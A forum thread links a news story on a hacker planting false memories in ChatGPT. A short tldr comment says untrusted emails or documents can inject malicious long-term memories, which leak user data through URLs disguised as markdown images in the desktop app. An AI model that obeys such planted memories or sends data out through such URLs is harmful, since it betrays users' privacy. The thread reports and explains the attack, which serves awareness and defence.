Hacker plants false memories in ChatGPT to steal user data in perpetuity
Hacker plants false memories in ChatGPT to steal user data in perpetuity
arstechnica.com Hacker plants false memories in ChatGPT to steal user data in perpetuity
Emails, documents, and other untrusted content can plant malicious memories.
You're viewing a single thread.
View all comments
34
comments
tldr
- it affects the desktop app of chatgpt, but likely any client that features long term memory functionality.
- does not apply to the web interface.
- does not apply to API access.
- the data exfiltration is visible to the user as GPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
108 0 Reply
You've viewed 34 comments.
Scroll to top